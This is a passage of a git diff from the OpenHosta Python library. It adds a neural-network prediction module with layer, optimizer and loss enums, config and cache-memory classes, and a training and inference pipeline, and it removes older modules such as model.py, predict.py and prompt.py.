+ for layer in torch_model.children():
+ try:
+ nn_layer = pytorch_layer_to_custom(layer)
+ network.add_layer(nn_layer)
+ except ValueError as e:
+ # print(f"Skipping unsupported layer: {e}")
+ pass
+
+ # Set loss function and optimizer if specified
+ if loss_fn is not None:
+ try:
+ network.loss_function = pytorch_loss_to_custom(loss_fn)
+ except ValueError as e:
+ print(f"Skipping unsupported loss function: {e}")
+
+ # Set optimizer if specified
+ if optimizer is not None:
+ try:
+ network.optimizer = pytorch_optimizer_to_custom(optimizer)
+ except ValueError as e:
+ print(f"Skipping unsupported optimizer: {e}")
+
+ return network
diff --git a/src/OpenHosta/exec/predict/model/neural_network_types.py b/src/OpenHosta/exec/predict/model/neural_network_types.py
new file mode 100644
index 0000000..1baae4d
--- /dev/null
+++ b/src/OpenHosta/exec/predict/model/neural_network_types.py
@@ -0,0 +1,154 @@
+from enum import Enum
+from typing import Optional, Union
+
+class ArchitectureType(Enum):
+ """
+ Enum for different built-in architectures for neural networks.
+ """
+ LINEAR_REGRESSION = 1
+ CLASSIFICATION = 2
+
+
+class LayerType(Enum):
+ """
+ Enum for different types of layers in a neural network.
+ https://pytorch.org/docs/stable/nn.html
+ """
+ LINEAR = 1
+ CONV2D = 2
+ RELU = 3
+ DROPOUT = 4
+ BATCHNORM1D = 5
+ BATCHNORM2D = 6
+ MAXPOOL2D = 7
+ AVGPOOL2D = 8
+ SIGMOID = 9
+ SOFTMAX = 10
+ TANH = 11
+
+class OptimizerAlgorithm(Enum):
+ """
+ Enum for different types of optimizers in a neural network.
+ https://pytorch.org/docs/stable/optim.html#algorithms
+ """
+ ADADELTA = 1
+ ADAFACTOR = 2
+ ADAGRAD = 3
+ ADAM = 4
+ ADAMW = 5
+ SPARSEADAM = 6
+ ADAMAX = 7
+ ASGD = 8
+ LBFGS = 9
+ NADAM = 10
+ RADAM = 11
+ RMSPROP = 12
+ RPROP = 13
+ SGD = 14
+
+class Device(Enum):
+ """
+ Enum for different types of devices to run the neural network
+ """
+ CPU = "cpu"
+ CUDA = "cuda"
+
+class LossFunction(Enum):
+ """
+ Enum for different types of loss functions in a neural network.
+ https://pytorch.org/docs/stable/nn#loss-functions
+ """
+ L1_LOSS = 1
+ MSE_LOSS = 2
+ CROSS_ENTROPY_LOSS = 3
+ CTC_LOSS = 4
+ NLL_LOSS = 5
+ POISSON_NLL_LOSS = 6
+ GAUSSIAN_NLL_LOSS = 7
+ KL_DIV_LOSS = 8
+ BCE_LOSS = 9
+ BCE_WITH_LOGITS_LOSS = 10
+ MARGIN_RANKING_LOSS = 11
+ HINGE_EMBEDDING_LOSS = 12
+ MULTI_LABEL_MARGIN_LOSS = 13
+ HUBER_LOSS = 14
+ SMOOTH_L1_LOSS = 15
+ SOFT_MARGIN_LOSS = 16
+ MULTI_LABEL_SOFT_MARGIN_LOSS = 17
+ COSINE_EMBEDDING_LOSS = 18
+ MULTI_MARGIN_LOSS = 19
+ TRIPLET_MARGIN_LOSS = 20
+ TRIPLET_MARGIN_WITH_DISTANCE_LOSS = 21
+
+class Layer:
+ """
+ Initialize a Layer object.
+
+ :param layer_type: The type of the layer.
+ :param in_features: Number of _inputs features or channels.
+ :param out_features: Number of _outputs features or channels.
+ :param kernel_size: Size of the kernel/filter.
+ :param stride: Stride of the kernel/filter.
+ :param padding: Padding added to the _inputs.
+ :param dropout: Dropout rate.
+ """
+ def __init__(
+ self,
+ layer_type: LayerType,
+ in_features: Optional[int] = None,
+ out_features: Optional[int] = None,
+ kernel_size: Optional[Union[int, tuple[int, int]]] = None,
+ stride: Optional[Union[int, tuple[int, int]]] = None,
+ padding: Optional[Union[int, str]] = None,
+ dropout: Optional[float] = None,
+ ):
+ self.layer_type: LayerType = layer_type
+ self.in_features: Optional[int] = in_features
+ self.out_features: Optional[int] = out_features
+ self.kernel_size: Optional[Union[int, tuple[int, int]]] = kernel_size
+ self.stride: Optional[Union[int, tuple[int, int]]] = stride
+ self.padding: Optional[Union[int, str]] = padding
+ self.dropout: Optional[float] = dropout
+
+ def __repr__(self):
+ """
+ Return a string representation of the Layer object.
+
+ :return: String representation of the Layer object.
+ :rtype: str
+ """
+ return (
+ f"Layer(type={self.layer_type}, "
+ f"in_features={self.in_features}, "
+ f"out_features={self.out_features}, "
+ f"kernel_size={self.kernel_size}, "
+ f"stride={self.stride}, "
+ f"padding={self.padding}, "
+ f"dropout={self.dropout})"
+ )
+
+ def to_json(self):
+ """
+ Convert the layer configuration to a JSON string.
+
+ :return: JSON string representation of the layer
+ :rtype: str
+ """
+ json = {}
+
+ if self.layer_type is not None:
+ json["layer_type"] = self.layer_type.name
+ if self.in_features is not None:
+ json["in_features"] = self.in_features
+ if self.out_features is not None:
+ json["out_features"] = self.out_features
+ if self.kernel_size is not None:
+ json["kernel_size"] = self.kernel_size
+ if self.stride is not None:
+ json["stride"] = self.stride
+ if self.padding is not None:
+ json["padding"] = self.padding
+ if self.dropout is not None:
+ json["dropout"] = self.dropout
+
+ return json
diff --git a/src/OpenHosta/exec/predict/predict.py b/src/OpenHosta/exec/predict/predict.py
new file mode 100644
index 0000000..c5d7e2f
--- /dev/null
+++ b/src/OpenHosta/exec/predict/predict.py
@@ -0,0 +1,160 @@
+import os
+from typing import Union, Optional
+
+from .dataset.dataset import HostaDataset, SourceType
+from .dataset.oracle import LLMSyntheticDataGenerator
+from .model import HostaModel
+from .model.model_provider import HostaModelProvider
+from .model.neural_network import NeuralNetwork
+from .predict_config import PredictConfig
+from .predict_memory import PredictMemory, File
+from ...core.config import Model, DefaultModel
+from ...core.hosta import Hosta, Func
+
+
+def predict(
+ config: PredictConfig = PredictConfig(),
+ oracle: Optional[Union[Model, HostaDataset]] = None,
+ verbose: int = 0
+) -> Union[int, float, bool, str]:
+ """
+ Predicts a result using an existing model or by creating a new one.
+
+ Args:
+ config: Model configuration
+ oracle: Reference model or dataset for data generation
+ verbose: Enables detailed logging
+
+ Returns:
+ Model prediction
+ """
+ assert config is not None, "Please provide a valid configuration not None"
+ assert verbose is not None and 0 <= verbose <= 2, "Please provide a valid verbose level (0, 1 or 2) default is 0"
+
+ func: Func = getattr(Hosta(), "_infos")
+
+ name = config.name if config and config.name else str(func.f_name)
+ base_path = config.path if config and config.path else os.getcwd()
+ memory: PredictMemory = PredictMemory.load(base_path=base_path, name=name)
+
+ dataset: Optional[HostaDataset] = None
+
+ hosta_model: HostaModel = get_hosta_model(memory.architecture, func, config, verbose)
+ if verbose == 2:
+ print(f"[\033[92mArchitecture\033[0m] loaded, type : {type(hosta_model).__name__}")
+
+ if not load_weights(memory, hosta_model, verbose):
+ train_model(config, memory, hosta_model, dataset, oracle, func, verbose)
+
+ if dataset is None:
+ dataset = HostaDataset.from_input(func.f_args, verbose)
+ else:
+ dataset.prepare_inference(func.f_args)
+ torch_prediction = hosta_model.inference(dataset.inference.input)
+ prediction = dataset.decode(torch_prediction, func_f_type=func.f_type[1])
+ if predict is list:
+ return prediction[0]
+ else:
+ return prediction
+
+
+def get_hosta_model(architecture_file: File, func: Func, config: Optional[PredictConfig] = None, verbose: int = 0) -> HostaModel:
+ """
+ Load or create a new model.
+ """
+ architecture: Optional[NeuralNetwork] = None
+
+ if architecture_file.exist:
+ with open(architecture_file.path, "r") as file:
+ json = file.read()
+ architecture = NeuralNetwork.from_json(json)
+ if verbose == 2:
+ print(f"[\033[92mArchitecture\033[0m] found at {architecture_file.path}")
+ else:
+ if verbose == 2:
+ print(f"[\033[93mArchitecture\033[0m] not found, creating one")
+ return HostaModelProvider.from_hosta_func(func, config, architecture, architecture_file.path, verbose)
+
+
+def load_weights(memory: PredictMemory, hosta_model: HostaModel, verbose :int) -> bool:
+ """
+ Load weights if they exist.
+ """
+ if memory.weights.exist:
+
+ if verbose == 2:
+ print(f"[\033[92mWeights\033[0m] found at {memory.weights.path}")
+ hosta_model.init_weights(memory.weights.path)
+ return True
+
+ if verbose == 2:
+ print(f"[\033[92mWeights\033[0m] not found generate new ones")
+ return False
+
+
+def train_model(config: PredictConfig, memory: PredictMemory, model: HostaModel, dataset: HostaDataset, oracle: Optional[Union[Model, HostaDataset]], func: Func, verbose: int) -> None:
+ """
+ Prepare the data and train the model.
+ """
+ if memory.data.exist:
+ if verbose == 2:
+ print(f"[\033[92mData\033[0m] found at {memory.data.path}")
+ train_set, val_set = HostaDataset.from_data(memory.data.path, batch_size=1, shuffle=True, train_set_size=0.8, verbose=verbose) # verbose will prcess all the example and add it to val_set
+ else:
+ if verbose == 2:
+ print(f"[\033[93mData\033[0m] not processed, preparing data")
+ train_set, val_set = prepare_dataset(config, memory, dataset, func, oracle, verbose)
+
+ if config.epochs is None:
+ config.epochs = int(2 * len(train_set.dataset) / config.batch_size if config.batch_size != len(train_set.dataset)\
+ else 2 * len(train_set.dataset))
+ assert config.epochs > 0, f"epochs must be greater than 0 now it's {config.epochs}"
+
+ model.trainer(train_set, epochs=config.epochs)
+
+ if verbose > 0:
+ model.validate(val_set)
+
+ model.save_weights(memory.weights.path)
+
+
+def prepare_dataset(config: PredictConfig, memory: PredictMemory, dataset: HostaDataset, func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> tuple:
+ """
+ Prepare the dataset for training.
+ """
+ if config.dataset_path is not None:
+ if verbose == 2:
+ print(f"[\033[92mDataset\033[0m] found at {config.dataset_path}")
+ dataset = HostaDataset.from_files(config.dataset_path, SourceType.CSV, verbose) # or JSONL jsp comment faire la détection la
+ else :
+ if verbose == 2:
+ print(f"[\033[93mDataset\033[0m] not found, generate data")
+ dataset = generate_data(func, oracle, verbose)
+ dataset.save(os.path.join(memory.predict_dir, "generated_data.csv"), SourceType.CSV)
+ if verbose == 2:
+ print(f"[\033[92mDataset\033[0m] generated!")
+ dataset.encode(max_tokens=10)
+ dataset.tensorify()
+ dataset.save_data(memory.data.path)
+
+ if config.batch_size is None:
+ config.batch_size = int(0.05 * len(dataset.data)) if 0.05 * len(dataset.data) > 1 else len(dataset.data)
+ train_set, val_set = dataset.convert_data(batch_size=config.batch_size, shuffle=True, train_set_size=0.8)
+
+ if verbose == 2:
+ print(f"[\033[92mDataset\033[0m] processed and saved at {memory.data.path}")
+ return train_set, val_set
+
+
+def generate_data(func: Func, oracle: Optional[Union[Model, HostaDataset]], verbose: int) -> HostaDataset:
+ """
+ Generate data for training.
+ """
+ data = LLMSyntheticDataGenerator.generate_synthetic_data(
+ func=func,
+ request_amounts=3, # TODO: make it a parameter
+ examples_in_req=80, # TODO: make it a parameter
+ model=oracle if oracle is not None else DefaultModel().get_default_model()
+ )
+ return HostaDataset.from_list(data, verbose)
+
diff --git a/src/OpenHosta/exec/predict/predict_config.py b/src/OpenHosta/exec/predict/predict_config.py
new file mode 100644
index 0000000..645b7ca
--- /dev/null
+++ b/src/OpenHosta/exec/predict/predict_config.py
@@ -0,0 +1,66 @@
+from typing import Optional
+
+from .model.neural_network_types import ArchitectureType
+
+
+class PredictConfig:
+ def __init__(self,
+ model_type: ArchitectureType = None,
+ name: str = None,
+ path: str = None,
+ version: str = None,
+ complexity: int = 4,
+ max_tokens: int = 10,
+ epochs: Optional[int] = None,
+ batch_size: Optional[int] = None,
+ learning_rate: Optional[float] = None,
+ get_loss: Optional[float] = None,
+ dataset_path: Optional[str] = None
+ ):
+ self.model_type: ArchitectureType = model_type
+
+ self.name: str = name
+ self.path: str = path
+ self.version: str = version
+
+ self.complexity: int = complexity
+ self.max_tokens: int = max_tokens
+
+ self.batch_size: int = batch_size
+ self.epochs: int = epochs
+ self.learning_rate: float = learning_rate
+ self.get_loss: float = get_loss
+ self.dataset_path: str = dataset_path
+
+ def to_json(self):
+ return f"""{{
+ "name": "{self.name}",
+ "model_type": "{self.model_type}",
+ "weight_path": "{self.path}",
+ "version": "{self.version}",
+ "complexity": {self.complexity},
+ "max_tokens": {self.max_tokens},
+ "epochs": {self.epochs},
+ "batch_size": {self.batch_size},
+ "learning_rate": {self.learning_rate},
+ "get_loss": {self.get_loss},
+ "dataset_path": "{self.dataset_path}",
+ }}"""
+
+ @staticmethod
+ def from_json(json_str: str):
+ import json
+ data = json.loads(json_str)
+ return PredictConfig(
+ name=data["name"],
+ model_type=ArchitectureType(data["model_type"]),
+ path=data["path"],
+ version=data["version"],
+ complexity=data["complexity"],
+ max_tokens=data["max_tokens"],
+ epochs=data["epochs"],
+ batch_size=data["batch_size"],
+ learning_rate=data["learning_rate"],
+ get_loss=data["get_loss"],
+ dataset_path=data["dataset_path"],
+ )
diff --git a/src/OpenHosta/exec/predict/predict_memory.py b/src/OpenHosta/exec/predict/predict_memory.py
new file mode 100644
index 0000000..74ebd04
--- /dev/null
+++ b/src/OpenHosta/exec/predict/predict_memory.py
@@ -0,0 +1,82 @@
+import os
+from enum import Enum
+from typing import Optional, Dict, NamedTuple
+
+from ...core.memory import HostaMemory
+
+# 1. Structures de base
+File = NamedTuple("File", [("exist", bool), ("path", str)])
+
+class PredictFileType(Enum):
+ """Enumaration for different types of files in the prediction memory."""
+ ARCHITECTURE = "model.json"
+ WEIGHTS = "weights.pth"
+ DICTIONARY = "dictionary.txt"
+ DATA = "data.json"
+ SUMMARY = "summary.txt"
+
+class PredictMemory(HostaMemory):
+ """
+ This module defines the PredictMemory class, which manages the structure of files for prediction purposes.
+ It inherits from HostaMemory, which handles the main cache directory.
+
+ He uses the File structure to store the status of each file and his path.
+ """
+ def __init__(self, base_path: Optional[str] = None, *, name: str = None, **kwargs):
+ super().__init__(base_path=base_path, **kwargs)
+ if name is None:
+ raise ValueError("name must be specified")
+ self.name = name
+ self.paths: Dict[PredictFileType, str] = {}
+ self.files: Dict[PredictFileType, File] = {}
+
+ @staticmethod
+ def load(base_path: Optional[str] = None, name: str = None) -> 'PredictMemory':
+ """
+ Static method to create or load a memory.
+ Args:
+ base_path: Base path for the memory.
+ name: Name of the memory.
+ Returns:
+ PredictMemory instance.
+ """
+ memory = PredictMemory(base_path=base_path, name=name)
+ memory._initialize_predict_directory
+ memory._check_files()
+ return memory
+
+ @property
+ def _initialize_predict_directory(self) -> None:
+ """
+ Initializes the directory and file structure for predictions.
+ """
+ self.predict_dir = os.path.join(self.cache_root, self.name)
+ self._ensure_directory_exists(self.predict_dir)
+ self.paths = {
+ file_type: os.path.join(self.predict_dir, file_type.value)
+ for file_type in PredictFileType
+ }
+
+ def _check_files(self) -> None:
+ """
+ Checks the status of all files.
+ """
+ for file_type in PredictFileType:
+ path = self.paths[file_type]
+ exists = os.path.exists(path) and os.path.getsize(path) > 0
+ self.files[file_type] = File(exist=exists, path=path)
+
+ @property
+ def architecture(self) -> File: return self.files[PredictFileType.ARCHITECTURE]
+
+ @property
+ def weights(self) -> File: return self.files[PredictFileType.WEIGHTS]
+
+ @property
+ def data(self) -> File: return self.files[PredictFileType.DATA]
+
+ @property
+ def summary(self) -> File: return self.files[PredictFileType.SUMMARY]
+
+ @property
+ def dictionary(self) -> File: return self.files[PredictFileType.DICTIONARY]
diff --git a/src/OpenHosta/exec/thinkof.py b/src/OpenHosta/exec/thinkof.py
new file mode 100644
index 0000000..6c36b53
--- /dev/null
+++ b/src/OpenHosta/exec/thinkof.py
@@ -0,0 +1,54 @@
+from __future__ import annotations
+
+import json
+from pydoc import locate
+
+from .emulate import emulate
+from ..core.config import DefaultManager
+from ..core.hosta import Func
+from ..utils.errors import RequestError
+from ..utils.meta_prompt import THOUGHT_PROMPT
+
+
+def guess_type(key: str, *args) -> object:
+ l_default = DefaultManager.get_default_model()
+
+ l_user_prompt = (
+ "Here's the function behavior:\n"
+ + f"{key}\n"
+ + "Here's the arguments:\n"
+ + f"{args}\n"
+ )
+
+ response = l_default.simple_api_call(
+ sys_prompt=f"{THOUGHT_PROMPT!r}{THOUGHT_PROMPT.USER_SEP}",
+ user_prompt=l_user_prompt,
+ temperature=0.5,
+ )
+
+ type_json = response["choices"][0]["message"]["content"]
+ type_dict = json.loads(type_json)
+ type_str = str(type_dict["type"])
+
+ return locate(type_str)
+
+
+def thinkof(key):
+
+ def inner_func(*args, **kwargs):
+ _infos: Func = Func()
+
+ if not hasattr(inner_func, "_return_type"):
+ setattr(inner_func, "_return_type", guess_type(key, *args))
+
+ _infos.f_def = key
+ _infos.f_call = str(*args)
+ _infos.f_type = ([], inner_func._return_type)
+
+ try:
+ result = emulate(_infos=_infos)
+ except Exception as e:
+ raise RequestError(f"[thinkof] Cannot emulate the function.\n{e}")
+ return result
+
+ return inner_func
diff --git a/src/OpenHosta/exec/thought.py b/src/OpenHosta/exec/thought.py
new file mode 100644
index 0000000..2b393b2
--- /dev/null
+++ b/src/OpenHosta/exec/thought.py
@@ -0,0 +1,8 @@
+from __future__ import annotations
+
+from ..core.hosta import Hosta, CotType
+
+
+def thought(task: str) -> None:
+ x = Hosta()
+ x._bdy_add('cot', CotType(task=task))
diff --git a/src/OpenHosta/exec/use.py b/src/OpenHosta/exec/use.py
new file mode 100644
index 0000000..943c676
--- /dev/null
+++ b/src/OpenHosta/exec/use.py
@@ -0,0 +1,34 @@
+from __future__ import annotations
+
+from typing import Any, Callable, Union
+
+from ..core.hosta import Hosta, UseType
+
+all = (
+ "use",
+ "VAR",
+ "TOOL",
+ "RAG",
+ "DB"
+)
+
+
+class VAR:
+ pass
+
+
+class TOOL:
+ pass
+
+
+class RAG:
+ pass
+
+
+class DB:
+ pass
+
+
+def use(obj: Union[Callable, Any], typ: Union[VAR, TOOL, RAG, DB], title: str):
+ x = Hosta()
+ x._bdy_add('use', UseType())
diff --git a/src/OpenHosta/model.py b/src/OpenHosta/model.py
deleted file mode 100644
index f49acde..0000000
--- a/src/OpenHosta/model.py
+++ /dev/null
@@ -1,102 +0,0 @@
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-import time
-import json
-
-class CustomLinearModel(nn.Module):
-
- def __init__(self, config, hidden_dir):
- super().__init__()
- self.hidden_dir = hidden_dir
- self.path = hidden_dir+"/config.json"
- if config == None:
- try:
- with open(self.path, 'r') as f:
- self.config = json.load(f)
- except Exception as e:
- raise Exception("Config file not found please check the path : ", self.path)
- else:
- self.config = config
-
- self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
- self.create_model(self.config)
-
- self.loss = nn.SmoothL1Loss()
- self.optimizer = torch.optim.AdamW(self.parameters(), lr=0.001)
- self.to(self.device)
-
- def create_model(self, config):
-
- input_size = config["input_size"]
- output_size = config["output_size"]
-
- hidden_sizes = []
- for key in config:
- if key.startswith("hidden_size_"):
- layer_num_str = key.split("_")[-1]
- if layer_num_str.isdigit():
- layer_num = int(layer_num_str)
- hidden_sizes.append((layer_num, config[key]))
- hidden_sizes.sort(key=lambda x: x[0])
-
- layer_sizes = [input_size] + [size for _, size in hidden_sizes] + [output_size]
-
- for idx in range(len(layer_sizes) - 1):
- in_features = layer_sizes[idx]
- out_features = layer_sizes[idx + 1]
- self.add_module(f"fc{idx + 1}", nn.Linear(in_features, out_features, dtype=torch.float32))
-
- return
-
- def forward(self, x):
- x = x.to(self.device)
- num_layers = len(self.config) - 4
- for idx in range(1, num_layers):
- layer = getattr(self, f"fc{idx}")
- x = F.relu(layer(x))
-
- layer = getattr(self, f"fc{num_layers}")
- x = layer(x)
- return x
-
-
- def train(self, train, val, epochs, path, verbose=False, get_loss=None, continue_training=False):
- get_loss=0.0 if get_loss is None else get_loss
-
- if continue_training:
- try:
- self.load_state_dict(torch.load(path+"/model.pth", weights_only=True))
- if verbose:
- print(f"\033[93mModel loaded from {path}/model.pth\033[0m")
- except Exception as e:
- raise Exception(f"Model weight not found at {path}/model.pth")
-
- total_start = time.time()
-
- for epoch in range(epochs):
- epoch_start = time.time()
- for X_train, y_train in train:
- X_train, y_train = X_train.to(self.device), y_train.to(self.device)
- self.optimizer.zero_grad()
- output = self.forward(X_train)
-
- loss = self.loss(output, y_train)
- loss.backward()
- self.optimizer.step()
- epoch_end = time.time()
- epoch_time = epoch_end - epoch_start
- if verbose:
- print(f"\033[94m{epoch}/{epochs} -> Loss: {loss.item()} in {epoch_time} sec\033[0m", flush=True)
-
- if loss.item() < get_loss:
- if verbose:
- print(f"\033[93mLoss target achieved at epoch {epoch} with loss {loss.item()} in {epoch_time} sec\033[0m", flush=True)
- break
-
- total_end = time.time()
- total_time = total_end - total_start
- if verbose:
- print(f"\033[92mTraining complete : Loss: {loss.item()} in a total of {total_time} sec\033[0m", flush=True)
-
- torch.save(self.state_dict(), path+"/model.pth")
diff --git a/src/OpenHosta/predict.py b/src/OpenHosta/predict.py
deleted file mode 100644
index c468a02..0000000
--- a/src/OpenHosta/predict.py
+++ /dev/null
@@ -1,195 +0,0 @@
-import os
-
-import pickle
-from .cache import Hostacache
-from .builder import Builder
-from .datapreparator import Datapreparator
-from .example import type_verificator
-from .emulate import _exec_emulate
-
-from typing import Any
-import inspect
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-def _exec_predict(
- _function_infos: dict = None,
- _function_obj: object = None,
-
- encoder = None,
- decoder = None,
- verbose: bool = False,
- prediction: list = [],
- complexity: int = None,
- config: dict = None,
- optimizer: str = None,
- loss: str = None,
- epochs: int = None,
- get_loss: float = 0.0,
- batch_size: int = None,
- force_train: bool = False,
- norm_max: float = None,
- norm_min: float = None,
- continue_training: bool = False,
- normalization: bool = False
-):
- hidden_dir = os.path.join(CACHE_DIR, f".model_{_function_obj.__name__}_{_function_infos['hash_function']}")
- os.makedirs(hidden_dir, exist_ok=True)
-
- config_path = os.path.join(hidden_dir, "config.json")
- weight_path = os.path.join(hidden_dir, "model.pth")
- normalisation_path = os.path.join(hidden_dir, "normalisation.json")
-
- preparator = Datapreparator(norm_max, norm_min, encoder, decoder)
- builder = Builder(hidden_dir)
-
- if not os.path.exists(config_path) or not os.path.exists(weight_path) or force_train==True:
-
- train, val = preparator.prepare(_function_infos, prediction)
-
- if normalization:
- train, val = preparator.normalize_dataset(train,val)
- preparator.save_normalization_params(normalisation_path)
- len_input = len(train[0][0])
- len_output = len(train[0][1])
- builder.build(len_input, len_output, complexity, config, optimizer, loss)
- if batch_size is None:
- batch_size = int(0.05 * len(train)) if 0.05 * len(train) > 1 else len(train) # 5% of the dataset or len(train) if len(train)
- else:
- batch_size = batch_size
- save_len = len(train)
- train, eval = preparator.split(train, val, batch_size)
- epochs = int(2*save_len / batch_size if batch_size != save_len else 2*save_len) if epochs is None else epochs
- assert epochs > 0, "epochs must be greater than 0 now it's {epochs}"
- builder.trains(config, train, eval, epochs=epochs, verbose=verbose, get_loss=get_loss, continue_training=continue_training)
- else:
- if verbose:
- print("\033[93mModel already trained, skipping training\033[0m")
- if normalization:
- preparator.load_normalization_params(normalisation_path)
- if _function_infos["function_args"] != {}:
- inference = preparator.prepare_input(_function_infos["function_args"])
- if normalization:
- inference = preparator.normalize_inference(inference)
- torch_inference = preparator.convert(inference)
-
- prediction = builder.load_inference(config_path, weight_path, torch_inference)
- if normalization:
- prediction_denormalize = preparator.denormalize_prediction(prediction)
- result = float(prediction_denormalize[0])
- else:
- result = float(prediction.detach().cpu().numpy()[0])
- return result
-
-
-def continue_train(func_obj, epochs=None, get_loss=None, verbose=False):
- """
- Continue the training of the model
- - Reload a pth and add a dataset or not for the model
- save a new pth after the training decided in the emulate or not or in this function also (diff parameters
- of training and not architecture)
- """
- infos_cache = load_cache(func_obj)
- return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=True ,continue_training=True, epochs=epochs, get_loss=get_loss, verbose=verbose)
-
-
-def get_input_types_from_signature(func_obj):
- """
- Extract input type from function signature
- """
- signature = inspect.signature(func_obj)
- input_type = {}
- for name, param in signature.parameters.items():
- if param.annotation != inspect.Parameter.empty:
- input_type[name] = param.annotation
- else:
- input_type[name] = Any
- return input_type
-
-
-def emulate_verificator(args, kwargs, input_type, func, example_dict):
- """
- Vérifie les types des arguments positionnels et nommés lors de l'appel à emulate.
- Met à jour example_dict avec les valeurs validées.
- """
- param_names = list(input_type.keys())
-
- total_args_provided = len(args) + len(kwargs)
- total_args_expected = len(param_names)
-
- if total_args_provided != total_args_expected:
- raise ValueError(
- f"Incorrect number of arguments for function '{func.__name__}', "
- f"expected {total_args_expected}, got {total_args_provided}."
- )
-
- for i, arg in enumerate(args):
- param_name = param_names[i]
- expected_type = input_type[param_name]
-
- if not isinstance(arg, expected_type):
- raise TypeError(
- f"Positional argument '{param_name}'={arg} does not match the expected type "
- f"{expected_type} in function '{func.__name__}'."
- )
- example_dict[param_name] = arg
-
- for key, value in kwargs.items():
- if key not in input_type:
- raise ValueError(
- f"Unexpected named argument '{key}' for function '{func.__name__}'."
- )
- expected_type = input_type[key]
-
- if not isinstance(value, expected_type):
- raise TypeError(
- f"Named argument '{key}'={value} does not match the expected type "
- f"{expected_type} in function '{func.__name__}'."
- )
- example_dict[key] = value
-
-
-def to_emulate(*args, func_obj, model=None, l_creativity=None, l_diversity=None, **kwargs):
- """
- Emulate the function with the given arguments and keyword arguments.
- """
- infos_cache = load_cache(func_obj)
- input_type = get_input_types_from_signature(func_obj)
-
- example_dict = {}
-
- emulate_verificator(args=args, kwargs=kwargs, input_type=input_type, func=func_obj, example_dict=example_dict)
- infos_cache["function_args"] = example_dict
- infos_cache["function_call"] = f"{func_obj.__name__}({', '.join([f'{k}={v}' for k, v in example_dict.items()])})"
- return _exec_emulate(_infos=infos_cache, _obj=func_obj, model=model, l_creativity=l_creativity, l_diversity=l_diversity)
-
-
-def load_cache(func_obj):
- func_name = func_obj.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- return cached_data
- else:
- raise ValueError(f"Cache not found for function '{func_name}'.")
-
-
-def retrain(func_obj=None, force_train=True, epochs=None, get_loss=None, verbose=False):
-
- infos_cache = load_cache(func_obj)
- return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=force_train, epochs=epochs, get_loss=get_loss, verbose=verbose)
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/src/OpenHosta/prompt.py b/src/OpenHosta/prompt.py
deleted file mode 100644
index a6be5cd..0000000
--- a/src/OpenHosta/prompt.py
+++ /dev/null
@@ -1,97 +0,0 @@
-import os
-import json
-import sys
-
-
-class PromptMananger:
- def __init__(self, json_path=None):
- if json_path is None:
- try:
- self.path = os.path.join(os.path.dirname(__file__), "prompt.json")
- except Exception as e:
- self.path = ""
- sys.stderr.write(f"[JSON_ERROR] Impossible to find prompt.json:\n{e}")
- return
- else:
- self.path = json_path
-
- try:
- with open(self.path, "r", encoding="utf-8") as file:
- self.json = json.load(file)
- self.prompts = {item["key"]: item for item in self.json["prompts"]}
- except FileNotFoundError:
- sys.stderr.write(f"[JSON_ERROR] File not found: {self.path}\n")
- self.prompts = {}
- except json.JSONDecodeError as e:
- sys.stderr.write(f"[JSON_ERROR] JSON decode error:\n{e}\n")
- self.prompts = {}
-
- def get_prompt(self, key):
- prompt = self.prompts.get(key)
- if prompt:
- return prompt["text"]
- sys.stderr.write(f"[JSON_ERROR] Prompt not found\n")
- return None
-
- def get_prompt_details(self, key):
- prompt = self.prompts.get(key)
- if prompt:
- return prompt
- sys.stderr.write(f"[JSON_ERROR] Prompt not found\n")
- return None
-
- def set_prompt(self, name: str, category: str, version: str, filepath: str):
- json_filepath = "prompt.json"
- new = {"key": "", "text": "", "category": "", "version": ""}
-
- try:
- with open(filepath, "r", encoding="utf-8") as file:
- prompt = file.read()
- except FileNotFoundError:
- sys.stderr.write(f"File {filepath} not found.")
- except IOError as e:
- sys.stderr.write(f"File error: {e}")
- else:
- try:
- with open(json_filepath, "r", encoding="utf-8") as json_file:
- data = json.load(json_file)
- except FileNotFoundError:
- sys.stderr.write(f"File {json_filepath} not found.")
- except IOError as e:
- sys.stderr.write(f"File error: {e}")
- except Exception as e:
- sys.stderr.write(e)
- else:
- new["key"], new["category"], new["version"] = name, category, version
- new["text"] = prompt
-
- found = False
- for elem in data["prompts"]:
- if elem["key"] == new["key"]:
- elem["text"] = new["text"]
- elem["version"] = new["version"]
- found = True
- break
-
- if not found:
- data["prompts"].append(new)
-
- try:
- with open(json_filepath, "w", encoding="utf-8") as json_file:
- json.dump(data, json_file, ensure_ascii=False, indent=4)
- except FileNotFoundError:
- sys.stderr.write(f"File {json_filepath} not found.")
- except IOError as e:
- sys.stderr.write(f"File error: {e}")
- except Exception as e:
- sys.stderr.write(e)
- else:
- print(f"{name} prompt has been added to {json_filepath}")
-
- def show_prompt(self, key):
- prompt = self.prompts.get(key)
- if prompt:
- print(prompt["text"])
- return prompt["text"]
- sys.stderr.write(f"[JSON_ERROR] Prompt not found\n")
- return None
diff --git a/src/OpenHosta/requirements.txt b/src/OpenHosta/requirements.txt
deleted file mode 100644
index 32c71f3..0000000
--- a/src/OpenHosta/requirements.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-Flask==3.0.3
-PyYAML==6.0.2
-pydantic==2.8.2
-Jinja2==3.1.4
-pyreadline3==3.4.1
\ No newline at end of file
diff --git a/src/OpenHosta/thought.py b/src/OpenHosta/thought.py
deleted file mode 100644
index ef059de..0000000
--- a/src/OpenHosta/thought.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import sys
-import json
-from pydoc import locate
-from pydantic import create_model
-
-from .emulate import _exec_emulate
-from .config import DefaultManager
-from .prompt import PromptMananger
-
-l_default = DefaultManager.get_default_model()
-_x = PromptMananger()
-_thought_sys_prompt = _x.get_prompt("thought")
-
-
-def thought(key):
- _function_infos = {
- "function_def": "",
- "function_call": "",
- "return_type": None,
- "return_type": None,
- "ho_example": None,
- "function_locals": None,
- "return_caller": None,
- }
-
- def inner_func(*args, **kwargs):
- global l_default, _thought_sys_prompt
-
- l_user_prompt = (
- "Here's the function behavior:\n"
